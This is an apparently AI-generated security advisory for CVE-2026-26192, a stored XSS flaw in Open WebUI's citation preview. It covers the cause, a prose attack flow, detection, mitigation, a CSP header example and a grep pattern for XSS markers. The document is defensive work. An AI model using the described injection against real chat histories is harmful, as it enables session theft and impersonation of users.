CVE-2026-26192 Overview
CVE-2026-26192 is a stored Cross-Site Scripting (XSS) vulnerability in Open WebUI, a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.7.0, manually modifying chat history allows setting the html property within document metadata. This causes the frontend to enter a code path that treats document contents as HTML and renders them in an iFrame when the citation is previewed. This allows stored XSS via a weaponized document payload in a chat, with the payload also executing when the citation is viewed on a shared chat.
Critical Impact
Attackers can execute arbitrary JavaScript in the context of victim users' browsers, potentially stealing session tokens, sensitive data, or performing actions on behalf of authenticated users when they preview citations in manipulated chat histories.
Affected Products
- Open WebUI versions prior to 0.7.0
Discovery Timeline
- 2026-02-19 - CVE CVE-2026-26192 published to NVD
- 2026-02-19 - Last updated in NVD database
Technical Details for CVE-2026-26192
Vulnerability Analysis
This stored XSS vulnerability exists in Open WebUI's citation rendering component, specifically within the CitationModal.svelte file. The vulnerability stems from improper handling of the html property in document metadata associated with chat histories. When a user manually modifies chat history data to include the html property within document metadata, the frontend application incorrectly interprets this as a signal to render the document contents as HTML rather than treating them as plain text.
The vulnerable code path renders the manipulated content within an iFrame element when users preview citations. Since the malicious payload is stored persistently in the chat history, this constitutes a stored XSS attack that can affect any user who views the compromised citation—including viewers of shared chats, significantly expanding the attack surface.
Root Cause
The root cause is improper input validation and insufficient output encoding (CWE-79) in the citation preview functionality. The application trusts the html property in document metadata without proper sanitization, allowing attackers to inject arbitrary HTML and JavaScript content that gets rendered in the victim's browser context.
Attack Vector
The attack is network-based and requires low privileges—an authenticated user with the ability to modify chat history. User interaction is required as victims must preview the malicious citation for the XSS payload to execute. The attack flow involves:
- An attacker manually modifies their chat history data
- The attacker injects the html property into document metadata with a malicious payload
- When any user previews the citation (including via shared chat links), the JavaScript payload executes
- The attacker can then steal session data, perform actions as the victim, or redirect to phishing pages
The vulnerability manifests in the CitationModal.svelte component at lines 163-170. For detailed technical analysis, see the GitHub Security Advisory GHSA-xc8p-9rr6-97r2 and the vulnerable component source code.
Detection Methods for CVE-2026-26192
Indicators of Compromise
- Unusual html properties appearing in document metadata within chat history records
- Chat history entries containing script tags, event handlers, or other HTML injection patterns
- User reports of unexpected browser behavior when viewing citations
- Anomalous JavaScript execution or network requests originating from citation preview iFrames
Detection Strategies
- Implement Content Security Policy (CSP) monitoring to detect inline script execution attempts within citation contexts
- Deploy web application firewall (WAF) rules to detect common XSS payloads in chat history modification requests
- Monitor application logs for chat history modification patterns involving the html metadata property
- Scan stored chat histories for HTML/JavaScript injection patterns in document metadata fields
Monitoring Recommendations
- Enable detailed logging for all chat history modification operations
- Set up alerts for CSP violations related to inline script execution in the citation modal component
- Monitor shared chat access patterns for suspicious activity following citation views
- Implement user behavior analytics to detect anomalous chat history editing patterns
How to Mitigate CVE-2026-26192
Immediate Actions Required
- Upgrade Open WebUI to version 0.7.0 or later immediately
- Audit existing chat histories for malicious html properties in document metadata
- Implement Content Security Policy headers to restrict inline script execution as a defense-in-depth measure
- Review and sanitize any shared chats that may contain compromised citations
Patch Information
Version 0.7.0 of Open WebUI addresses this vulnerability by properly sanitizing document metadata and preventing the unsafe rendering of HTML content from the html property. Organizations should update to this version or later to remediate the vulnerability. Refer to the GitHub Security Advisory for complete patch details.
Workarounds
- Restrict chat history modification capabilities to trusted administrators only until patching is complete
- Disable or limit chat sharing functionality temporarily to reduce exposure
- Implement network-level filtering to block requests containing suspicious HTML/JavaScript patterns in chat modification endpoints
- Deploy browser-side XSS protection extensions for users who cannot immediately upgrade
# Configuration example - Add Content Security Policy headers
# For nginx reverse proxy configurations
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; frame-src 'self'; object-src 'none';" always;
# Monitor logs for potential exploitation attempts
grep -E "(html|script|onclick|onerror)" /var/log/open-webui/access.log
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
